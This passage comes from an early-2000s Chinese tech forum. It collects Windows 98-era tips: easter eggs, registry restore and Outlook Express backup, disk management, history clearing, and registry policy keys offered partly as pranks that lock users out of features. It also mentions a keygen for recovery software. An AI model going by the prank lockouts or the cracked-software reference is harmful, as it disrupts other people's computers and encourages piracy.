(5). 在<目標>方格(保留原有文字) , 按Space鍵一下後鍵入 You_are_a_real_rascal
(6). 到<執行>方格選<縮到最小> -> 按<確定> 完成~
(7). 哈哈!! 有得睇喇 !!

<IE5.0 又有有隱藏動畫>
(1). 開啟記事本 -> 鍵入 <!-- introducing the Trident team -->
(2). 按<檔案> -> 選<另存新檔> -> 改名為 test.htm
(3). 雙按滑鼠 test.htm 檔案 , 完成

<Winamp有個鬼佬動畫>
(1). 開啟 Winamp
(2). 按<Winamp>左上角按扭 , 選<Nullsoft Winamp.....>
(3). 選<Winamp>項目 , 同時按下<Ctrl> <Alt> <Shift> 和在<Copyright>雙按滑鼠左鍵
(4). 有得睇喇 !!

<Norton AntiVirus大合照>
(1). 開啟 Norton AntiVitus , 進入<說明> -> 選<關於Norton AntiVirus>
(2). 同時按緊 <Shift> <Ctrl> <Ait> < n > < a > < v >
(3). 會有 Norton AntiVirus 工作人員合照,不同版本會有不同合照

<IE5.0有恐龍出世>
(1). 開啟 IE5.0 (要連上網絡) , 選<工具> -> <Internet工具>
(2). 選<語言> -> 按<新增> 在<使用者定義>鍵入 ie-ee -> 按<確定>
(3). 選<使用者定義 [ ie-ee ] > -> 按<上移> -> 按<確定>
(4). 在瀏覽器中按<搜尋> -> 在<輸入要搜尋的字串> 鍵入 Previous Searches -> 按<自訂>
(5). 恐龍出世!

<Netscape有魚看>
(1). 開啟 Netscape 瀏覽器(要連上網絡)
(2). 同時按<Ctrl> <Alt> < f >
(3). 有魚看喇 !

<Windows 95 開始列失蹤>
*Windows 95 OSR2 不能使用*
(1). 用滑鼠按<開始> -> 再按<ESC>鍵
(2). 同時按緊<Alt> < - >鍵
(3). 用滑鼠按<開始>鍵 -> 選<關閉>
(4). <開始>鍵便會消失!

<復原方法>
(1). 同時按<Ctrl> <Alt> <Del>鍵
(2). <關閉程式>中選<Explorer> -> 按<結束工作> -> 再選<否>
(3). 等<Explorer>視窗出現 , 選<結束工作>
(4). 或者用 Boot 機方法都可以復原<開始>

<Microsoft Word 97 打波子機>
(1). 開啟 Microsoft Word 97 -> 開新檔案
(2). 鍵入 Blue 並將他選取
(3). 按<格式> -> <字型> -> 在<字型樣式>選<粗體> 到<色彩> 選<藍色> 按<確定>
(4). 在 Blue 後面按<space>鍵
(5). 按<說明> 選<關於Microsoft Word>

<如何還原 Registry>

適用範圍：
Windows 98
Windows Me

如果你在執行 Regedit 時不小心改壞了登錄設定，或是不明的原因使得 Windows 的 registry 損壞，可以利用 scanreg.exe 的 restore 參數回存之前正確的登錄檔，讓你的 registry 起死回生。

語法：scanreg /restore

方法：

Windows 98：

重新開機，按 CRTL 鍵不放，就會出現開機選單，選擇「Command Prompt Only」。

到 C:\Windows\Command 目錄（在系統提示符號下鍵入：cd\windows\command 按 Enter，如果你的 Windows 作業系統並不是安裝在 C:\Windows 則請改成你的路徑）。

輸入 scanreg /restore 按 Enter

這時候，畫面上會出現好幾個前面有日期的 .cab 檔案選項，挑一個你認為那一天還是正常的項目，選擇 Restore 進行還原。

完成後，重新開機。

Windows Me：

由於 Windows Me 已經沒有 Command Prompt 的啟動選項，所以請用 Windows Me 的開機片開機，在系統提示符號之下（A:/>）直接輸入 scanreg /restore 按 Enter，其餘步驟比照 Windows 98。

提醒：

scanreg /restore 不是「系統還原」，它跟 Windows Me 的「系統還原功能」沒有關係，「系統還原」是還原整個系統，Scanreg /Restore 只還原 Registry。

Scanreg 它只是還原你之前正常的 registry 而已，假如你電腦的問題並不是單單由 registry 損壞造成的，即使還原了 registry 問題一樣不能解決。

還原的時候，要不要選擇最新的 .cab 檔？不一定，其實都可以，因為每一個 cab 檔都是好的，你都可以拿來還原，（因為沒有辦法成功開機，Windows 就不會備份當時的 registry），但是，「習慣上」，會用最近一次的，因為與「現況」最符合。

舉個例子：

假如我這五天來，什麼軟體（或硬體）都沒有安裝、移除，就單純的使用軟體而已，那麼這五天內的任何一個 .cab 我都可以拿來用，因為幾乎都是一樣的。

如果我亂改 registry 之後，Windows 不正常，那我就可以拿我昨天的來還原。

如果我昨天安裝了某軟體（例如驅動程式），而今天不知為什麼不能進入系統，那麼如果我拿前天的 cab 檔案還原會產生什麼問題？因為你前天的 registry 並沒有包含你新安裝的軟體的登錄，但是你新的軟體又實實在在存在於系統上，無法能預期會發生什麼樣問題。（可能沒事、可能有事）

所以 Scanreg/restore 只管復原 regstry，其他問題它一律不管，不要在「觀念上」就認為這是萬靈丹，不管什麼問題都可以修復，沒有這樣的說法。

<如何刪除信件中的">"的符號呢?>

方法如下:

在「工具」下的"選項"中，會出現一個對話方塊，請點
選「傳送」下的「郵件傳送格式」，再按「純文字設定」
，然後把「回覆或轉寄時須原函內縮並加>符號」前面的
v(勾勾)刪除，再按「確定」即可。
這樣一來你轉寄給別人的信件就不會有一大堆的>>>>>>符
號了。請把這個方法轉寄給你的朋友知道，好讓你和你的朋
友收到信件不會看到這個討厭的符號。

<如何備份 OE 5 的郵件>

適用範圍：
Outlook Express 5.x

這已經是一個很老的問題了，以前也寫過相當多的文章，我在網站上也有說明，不過最近提出的人實在很多（是不是你們都沒有仔細找呀？..:Q），有鑒於總是有人備份失敗、郵件匯不進來..等等，以前的 文章，可能我寫得太複雜，不容易看懂，所以我重新再整理、簡化一次。

我儘量依我所能，一步驟一步驟講清楚，照著做，就不會有問題。這裡所講的方法其實跟以前我講的並沒有什麼不同，只是我把它再講得仔細、條理化一點，讓你很容易的一步一步完成。

■如何備份郵件：

進入 Outlook Express 5

到「工具」>>「選項」

到「維護」頁，按「郵件檔資料夾」，在出現郵件路徑的那個欄位裡 Click 一下，讓游標停在上面，按滑鼠右鍵，選「全選」，再按滑鼠右鍵選「複製 」。﹙目的是要複製那一長串的路徑，因為通常都很長，不好抄，所用這個 方法把它 copy 下來﹚

按「取消」，再按「取消」。

按工作列上的「開始」>>「執行」，在開啟欄裡，按 Ctrl + V﹙這是貼上 你剛才複製的路徑﹚，按確定。

到「編輯」，選「全選」。

到「編輯」，選「複製」，把所有的檔案 Copy 到你要保存的資料夾裡，例 如 D 磁碟機裡的 MyMail 資料夾，D:\Mymail

D:\Mymail： 這個名字我只是用來舉例，不要死死板板的認為一定要取這種名字（我就碰過這種人，我差點沒昏倒），資料夾名稱是隨你喜好來取的。

但是盡量不要用中文當作你存放郵件的資料夾名稱 ，也不要把郵件放到 My Documents 這類虛擬資料夾下。

■如何匯入以前備份的郵件呢？（註）

光是學會了備份沒有用，郵件要能叫回來才有用，那要怎麼樣才能把以前備份出來的郵件，放回到我目前的 Outlook Express 5 裡呢？

開啟 Outlook Express，到「檔案」>>「匯入」，選「郵件」。

選擇 Outlook Exoress 5，按「下一步」。

指定來源設為：「從 OE5 郵件檔匯入郵件」，按確定。

按「瀏覽」，選擇你的郵件檔來源，例如 D:\Mymail

選擇「所有資料夾」，按下一步，按完成。

註：

採「匯入」的方式，並沒有辦法保存你備份資料中的郵件「標幟」，就是說，如果你備份郵件中的某些郵件，前面有加上「小旗子」、「眼鏡」這類標記，匯入到新的 OE 5 環境中時，都會消失。

如果你要保留這些舊郵件的標幟，就要靠更改郵件資料夾的位置來完成（工具>>選項>>維護>>郵件檔資料夾，指向到你舊郵件的位置），但是這樣一來，新郵件就會不見了，那些在新的 OE 5 環境中的郵件都會被刪掉，如果你是剛剛安裝好的作業系統，OE 裡本來就是空的，採取這種方式匯入，當然就沒有影響，否則的話，只好請你自己做一個取捨，自己決定要郵件或是要標幟。

<不輸入密碼不讓你進入Windows>

如何才可在進入Windows必須輸入密碼才可進入視窗.(註.本人所用的是Windows98)

等級修改：★★★
準備事項：需抱著不成功便成仁的心態來修改
修改程序：
1.開始→執行→填入" regedit"

2. HKEY_LOCAL_MACHINE\Network\Logon

3. 新增一個DWORD值,重新命名為MustBeValidated,並對著它按滑鼠右鍵並選修改,在數值資料一欄輸入1,並按下確定

4. 重新啟動電腦，哈哈這下你怎按Esc也沒用啦！這次是真的要你輸入密碼才行進入

<以Registry限制電腦使用權>

Poledit可設出限制一台電腦使用者使用權,而用Registry其實也可以

等級修改：★★★★
準備事項：需抱著不成功便成仁的心態來修改
修改程序：
1.開始→執行→填入" regedit"

2.HKEY_Current_User/Software/Microsoft/Windows/CurrentVersion/Policies

3.這時,你可會找到Explorer或Network等項目

4.其它在Policies可建造的項目包括System 和 WinOldApp

5.在每個項目中,你可加入不同的Registry Key (DWORD) 來控制使用者權限

6.例如在Explorer Key,可以加上 (二進位值) 00=不生效 01=生效

CDRAutoRun

NoDeletePrinter 取消打印機刪除

NoAddPrinter 取消多餘打印機

NoRun 取消執行指令 **

NoSetFolders 移除Start Menu的 Folders **

NoSetTaskbar 移除Start Menu 設定中的Taskbar **

NoFind 移除尋找指令 **

NoDrives 隱藏我的電腦 **

NoNetHood 隱藏網絡上的芳鄰 **

NoDesktop 隱藏所有桌面圖示

NoClose 取消關閉電腦

NoSaveSettings 臨關機不用儲存桌面設定

DisableRegistryTools 取消Registry 修改工具(這個使用時必須極之小心) **

NoRecentDocsHistory 把最近開啟過的檔案清除

ClearRecentDocson exit 每次離開清除檔案清單

NoInternetIcon 把Internet 小圖示從桌面隱藏

7.至於System方面包括

NoDispCPL 隱藏控制台

NoDispBackgroundPage 隱藏背影牆紙

NoDispScrSavPage 隱藏營幕儲存檔

NoDispSettingsPage 將顯示器之設定隱藏

NoSecCPL 隱藏控制台的密碼圖示

NoPwdPage 隱藏修改密碼的圖示

NoAdminPage 隱藏遠端管理

NoProfilePage 隱藏使用者設定

NoDevMgrPage 隱藏裝置管理員

NoConfigPage 隱藏硬件資料

NoFileSysPage 隱藏系統資料

NoVirtMemPage 隱藏虛擬記憶體資料

8.在網絡Network一項

NoNetSetupSecurityPage 沒有網絡安全設定

NoNetSetup 取消控制台的網絡設定

NoNetSetupIDPage 隱藏網絡中識別項目

NoNetSetupSecurityPage 隱藏讀寫授權控制

NoFileSharingControl 取消檔案分享

NoPrintSharing 取消打印分享

9.在WinOldApp一項

Disabled 隱藏MS-DOS Prompt

NoRealMode 取消MS-DOS 單一模式

10.重新啟動電腦看看效果如何，你一定會後悔的^___^

<啟動Win時，播放midi檔>

等級修改：★★
準備事項：需抱著不成功便成仁的心態來修改
修改程序：
1.進入【控制台】→【聲音】→【事件】→【啟動 Windows】→【聲音】→【名稱】→【(無)】→【確定】

2.開啟【檔案總管】，選擇您啟動 Windows 時，所要播放的 midi 檔案（這裡用 windows\media\canyon.mid 做範例）。

3.在【開始】右擊滑鼠→【開啟舊檔】→雙擊【Programs】→雙擊【啟動】

4.右擊選好的 midi 檔案，將其拖曳到【啟動】，放開右鍵，選【在此建立捷徑】

5.右擊剛剛建立的捷徑→【內容】

6.選【捷徑】那個標籤，將【目標(T)】的文字改成windows\mplayer.exe /play /close windows\media\canyon.mid

7.按【確定】，離開。

8.準備好你的喇叭，重新啟動 Windows，聽聽看不一樣的啟動音樂。

<救回從磁碟中刪除的檔案>

所需軟體 : Revival 註冊機

很多人都曾經問過站長,在硬碟或軟碟中刪除了的檔案,可否得救回。其實這個真的是很多電腦用家的問題,因為一時的大意或中了好像 CIH 這類會刪除檔案的病毒,都會使到檔案不見了!所以站長今次就教大家怎樣救回從磁碟刪除了的檔案。

使用方法:
首先先開啟 Revival ,然後可以按 "Edit" 選擇使用那一種方式,一般上選 "Basic Root Dir" 便可以了。接著,便按 "File" 選 "Open Drive", 這個時候便選擇你欲修復檔案的磁碟機,便按下 "Select" ,這時 Revival 便會搜尋磁碟機中的第個磁區,並把所有檔案資料夾及檔案名稱顯示出來,這也包括一已被刪除的檔案,你只要選擇要復原的檔案,再選擇儲存位置便行了。

其實 Revival 不止是這些功能而已,它還可以把整張快速格式化後的軟碟或硬碟的資料刪除及格式化,對於怕別人得到自己一些重要的檔案的用者來說,真是十分實用。>能而已,它還可以把整張快速格式化後的軟碟或硬 碟的資料刪除及格式化,對於怕別人得到自己一些重要的檔案的用者來說,真是十分實用。

注意事項:
Revival 在儲存檔案時,一定要選擇檔案儲存在另一台磁碟機,這是因為防止救回來的檔案覆蓋原先的檔案。
另外, Revival 支援 FAT 16 、 FAT 32 、 NTFS 格式。而 Revival 最大的缺點我想就是不支援長檔名,但一樣可以復原長檔名的檔案,只是檔案名稱改變了!

-=不管结局怎样坏，我会勇敢撑下来=-
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-10 09:49:19 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
哇！
我看了好长时间啊！真够长的！

提醒：技术区里这样的回复不是很合适，请注意，谢谢

[这消息被啸编辑过(编辑时间2002-02-10 17:04:25)]

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

xqlyg

超级用户
积分：362
发帖：92
来自：china
注册：2002-02-07
 发表于 2002-02-11 22:48:16 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
是很长，但是很有用，谢谢你了。
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-12 14:55:21 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
繁体字看得好累啊，以后能找简体字就最好拉

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：[转帖] 一些電腦小技巧
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


做一个好的windows管家 - 经 典 论 坛

计算机技术
做一个好的windows管家

上一贴 | 下一贴
发表人 主题: 做一个好的windows管家
51windows

海娃
积分：4495
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-15 08:14:01 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
做一个好的windows管家！跟我来吧！
拥有自己的电脑已经有半年了，回想自己的电脑学习之路！觉得有点自己的一点点特色，在这里写给大家，一同来分享吧！
如果刚买了电脑，就要先把硬盘的区分好，因为现在的硬盘越来越大了，管理好硬盘就一定要把区分好！
－－一般的要分二个以上的区，这样比较容易管理硬盘上的资料，要是硬盘大的话，要分四到六到区也不算多，像我的计算机，虽然只有10.2G，但我还是分了五个区，第一个装windows98,D盘装windows2000,E盘是下载的软件和电脑的驱动程序，F盘是存放我的mp3与做的网页与资料，还有我同学的一些资料、G盘是一些稍微乱的东西了！常用的稍大一点的软件，像flash,office,放到E、F盘上。还要注意不要使某个分区利用率大于80％，除了空间不够了！好处：这样即使把C、D盘都格了，也不会把自己的资料丢失！

关于应用软件的问题！
－－－一般一种功能的软件只要装一种就行了。当然要选最适合自己的，像常用的下载工具，虽然大小都不大，但也不要装多个！否则会影响机子的运行速度！

管理好自己的软件！
－－－要是与注册表无关的软件，就最好不要放到系统盘上！否则重装系统后还要重新安装！对于这类软件，最好都为它们创建一个快捷方式，把这些快捷方式放到一个文件夹里，把它们放到开始菜单里，如果想更方便的话，可以为它们建一个快捷键！点击快捷方式的属性，里面有一页快捷键，要用三键（ctrl+alt+?）.那个问号最好要软件的地一个字母！像oicq，就用ctrl+alt+o .有很多开始菜单里 的快捷方式，像acdsee.winzip...都可以把它删除，桌面上也不要太多的快捷方式，只需要几个常用的就行了！

关于重装操作系统！
－－－电脑运行的时间久了，一定会变的慢了，这时你就有必要重新安装系统了。现在有不少软件(像ghost..)可以复制整个系统！利用它们重装系统会很省时间的！不过克隆时要注意，最好是刚装完的新系统，如果有大型的、与改动注册表的软件最好装好后再克隆。（像office.）还有一点：放克隆的文件的区，最好不要进行整理！否则有可能，不能恢复！
以上是海娃的一点点的小小经验吧，以上只是九牛一毛...还请多多指导教!

－－－－
以前写的
－－－－

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-03-01 11:16:45 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
推上来让大家看看。

相信大家也会有自己的体会和经验，不妨也谈谈。

对于软件，除了象51windows说的，我还有一个体会，就是安装多操作系统，不同用途的软件装在不同的系统中。比如我的机子装了3个windows：98/xp/2000.xp是平常使用的，装一些平常的软件；2000是用来调试网站后台的，装了IIS,sql server等；98是用来应急的,装了硬盘分区魔术师之类的。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

xiaoxiao2001

超级用户
积分：402
发帖：186
来自：
注册：2001-09-20
 发表于 2002-03-01 11:36:02 按此观看xiaoxiao2001的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给xiaoxiao2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xiaoxiao2001的IP
看了上面的说法，我有点想法．就是我不明白，非要多个系统共存吗？用２０００不好吗？当然，有些老软件还是用的上９８的．

    我给现在的大硬盘是这样分的，选择操作系统Ｗｉｎ２０００，把Ｃ盘划大点，全部装在Ｃ盘，备份注册表，Ｇｈｏｓｔ一下！如果用９８，可以在装２０００前试先装一下，９８和２０００在Ｃ：Ｄ：盘下！建议再分一个Ｅ：区就够了，装ＭＰ３，影视，等，建好目录，Ｇｈｏｓｔ也在Ｅ，我是这样想的，不知道大家怎么看？

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-03-01 11:51:03 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
当然可以只用一个操作系统，只是个人的爱好不同罢了.
原来我也是只用xp,什么软件都装在上面，但后来发现其实有很多软件只有在做某些特定的事情时才用到，放在那影响启动的速度，所以才选择了多个操作系统来完成不同的任务。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

xiaoxiao2001

超级用户
积分：402
发帖：186
来自：
注册：2001-09-20
 发表于 2002-03-01 11:53:50 按此观看xiaoxiao2001的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给xiaoxiao2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xiaoxiao2001的IP
因人而定，呵呵 ;) ;) ;)
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-03-01 21:21:24 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
正打算写一些的，诸如论坛安装调试，代理设置以及局域网，还有电脑音乐制作方面的一些个人体会和经验，慢慢整理一下，贴上来，希望有人看哪！
51windows

海娃
积分：4495
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-03-03 22:26:47 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
几天没来，版主帮我置顶了！谢谢。

这几天刚买了一个40G的硬盘，分了9个区，后面两个区装两个windows2000，一个英文的，一个中文的。以后再装服务器版。。

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

mch

口吃
积分：2165
发帖：1053
来自：Shanghai
注册：2001-04-02
 发表于 2002-03-04 20:51:24 按此观看mch的个人资料 按此发邮件给mch 访问mch的主页 mch 的 oicq 是25733502,查看 25733502 的资料 发送悄悄话给mch 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mch的IP
我对系统做了些设置，把程序运行时产生的临时文件（如IE等）集中都放在一个区里，使装操作系统的分区尽量少的产生磁盘碎片，能较长时间保持电脑高效运行，磁盘碎片整理时间也缩短了，系统也用不着经常重装。

我把时间荒废了，时间便把我荒废了。

Blueidea Web Team
Team Symbol

上一贴 | 下一贴
快速回复 主题：做一个好的windows管家
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


系统文件大搬迁（转） - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
系统文件大搬迁（转）

上一贴 | 下一贴
发表人 主题: 系统文件大搬迁（转）
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-18 10:02:56 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
挺基础的，可能许多朋友都知道了，也不妨复习一下

引自：http://personal.htxx.com.cn/rewin/htm/3017.htm

《Win98系统文件大搬迁》

    如何保护电脑内的重要资料，这是一个非常重要的问题。对我们广大一般用户而言，最为重要的是做到：系统和重要文件隔离。简而言之，就是尽量做到在C盘中只放系统文件，将所有重要的数据文件都“搬迁”到其它的硬盘或分区上，例如D盘。
    保护数据的思想明确了，往下就是动手了。你只要按照我提供的方法一步一步做下来，即使脆弱的Windows 98再发生系统崩溃，你只要重装系统，再进行一些简单的设置，你所有的宝贵资料就会一个不少地回到你的电脑中。
    第一步：一般文档的搬迁
    一般的缺省情况下，像MS Office等应用频率较高的软件都会将其产生的文件保存到“我的文档”中去，因此我们首要任务是将“我的文档”移到D盘：
    （1） 在桌面上用鼠标右键单击“我的文档”图标，选择“属性”，在弹出的图框中，将“目标”栏里的“C:\my documents”中的C改为你需要的路径，如改为“D: \my documents”。这样，在D盘根目录下就出现了“我的文档”图标；
    （2） 剩下的就是将原来在C盘根目录下的My Documents文件夹中的所有文件拷贝到D: \my documents中，再将C盘下的原文件夹删除即可。在以后的使用中，你不用再做其它设置，像Office一类的软件都会将其存放文件的地址自动转到D:\my documents中。
    当你重装系统时，只要重复步骤（1），你在“我的文档”中的文件就又回来了。
    第二步：因特网临时文件的搬迁
    鉴于目前国内的网费较贵，因此离线浏览就成了广大网民的省钱方法之一。久而久之，在Windows 98因特网的临时文件夹中就留下了大量可供离线浏览的网页，每次系统崩溃，它们也就随之成为Windows 98的陪葬，着实可惜。
    因此我们有必要也对它来一个大“搬迁”，方法是：
    （1） 在D盘建立一个“Internet Cache”文件夹；
    （2） 桌面上鼠标右键单击IE的蓝色图标，选择“属性”，在“常规”标签中，选择“Internet临时文件”中的“设置”按钮；
    （3） 在弹出的“设置”框中，单击“移动文件夹”按钮，这时你就可以选择刚才建立的D盘中的“Internet Cache”文件夹，然后“确定”；
    （4） 系统会自动重启，更新设置，原来在C盘中的脱机浏览内容就会自动转移到“Internet Cache”文件夹中，而你以后上网浏览的网页，也将自动保存在这里。
    在重装系统后，你只要重复一下步骤（3），就又可以脱机浏览原先的网页了。
    注意，本方法只适用于IE5.0以上的版本。另外，你最好将该临时文件夹的缓存设得大一些，保存时间设得长一些（在步骤2的“常规”标签中有以上选项），以便更好地脱机浏览。
    第三步：OE5邮件的搬迁
    既然提到了因特网，就不能忘了电子邮件。操作方法如下：
    （1） 在“工具”中选择“选项”，单击“维护”标签，在其“清除邮件”项中，可以见到“单击‘存储文件夹’以改变你存储邮件的位置”这一条；
    （2） 点击其后的“存储文件夹”按钮，选择“更改”，制定自己的电子邮件存放位置即可（记住要与系统在不同的硬盘或分区上），如D:\My Mails；
    （3） 为了使设置生效，你还必须关闭OE5，再重新打开它。怎么样，原来OE5默认文件夹下的电子邮件都自动移到你指定的文件夹之中了吧！
    倘若一朝系统崩溃，你重装了系统，在新安装的OE5中你只需再重新制定一下存储文件夹的位置，也就是重复一下步骤（1）和（2），关闭OE5，再重新打开，你原来的电子邮件就又回到新安装的OE5中去了。这样，你就再也不用担心丢失重要的信件了。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：系统文件大搬迁（转）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


清除电脑中的各类历史记录 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
清除电脑中的各类历史记录

上一贴 | 下一贴
发表人 主题: 清除电脑中的各类历史记录
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-02-28 11:06:55 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 收藏该主题供以后查看 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
1. 清除“开始/文档”中曾经打开的文件列表

这是一个最明显的操作痕迹，明白的人一到这里就可以看到你在电脑上打开了什么文件。清除方法如下：用鼠标右键单击任务栏，选择属性，打开状态栏属性窗口，切换到“开始菜单程序”页面，点击“文档菜单”下的“清除”命令，你曾经打开过的文件列表就一扫而空了。

2. 清除Internet的URL历史列表

经常上网的人都知道，浏览器会为你保留你的曾经打开过的URL并为其建立一个历史文件夹，所以你可以在任何时候打开浏览器中的URL历史记录，来打开曾经打开过的网址。但这也给我们这些需要为历史保密的操作者造成了困难。清除URL历史记录方法如下：打开浏览器（这里以IE为例），执行“工具/Internet选项…”，在打开窗口的“常规”页面中，在“Internet临时文件”中点击“删除文件”按钮将临时文件夹删除，在“历史记录”中点击“清除历史记录”按钮将历史记录删除，这样你就不用担心自己曾打开的网址被别人知道了。

3. 清除“开始/查找”中的历史列表

你会问这也算历史记录吗？当然算。在“开始/查找”下拉菜单中，有你所查找的所有文件列表，清除方法如下：运行注册表编辑器Regedit程序，依次选HKEY_USERS\.Default\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU，右面窗口中出现的即是“开始/查找”对话框中输入的文件，在此可选择性地将不需要的历史记录删除。其实在这里还有另外一个作用，如果你是单机用户，也可以仿照列表为自己创建查找文件了，呵呵……。

4. 清除“开始/运行”中的历史记录

什么？运行中也有历史记录？当然有，打开你的“开始/运行”下拉菜单看看，Oh My God！(天哪！)该怎样清除呢？方法如下：运行注册表编辑器Regedit程序，查找关键字" RunMRU "，右面窗口中出现的即是“开始/运行”对话框中输入的文件，在此可选择性地将不需要的历史记录删除。同上，另一个作用自然是仿照它添加运行命令了。

5. 清除临时文件

临时文件也算历史记录吗？要做到真正的踏雪无痕，临时文件是必须清除的，原因很简单，你的一些操作有可能就是以临时文件存在的。清除方法很简单了，首先清除C:\Temp和C:\Windows\Temp目录中的文件，另外，使用“开始/查找/文件或文件夹”命令，查找*.tmp等各种临时文件，然后删除之。

经过上面的各种操作以后，您的机器就会更加干净了。

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-28 14:18:18 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
补充：如果需要删除指定的URL纪录，可以编辑注册表，在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs 里面，可以删除你不需要的地址，不过要注意，不论你删除了多少条，都必须保证剩余的URL键名仍然是从1开始递增的，否则你剩余的URL将不再可用

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：清除电脑中的各类历史记录
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


七分靠大胆！三分靠实践！！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
七分靠大胆！三分靠实践！！

上一贴 | 下一贴
发表人 | 主题: 七分靠大胆！三分靠实践！！
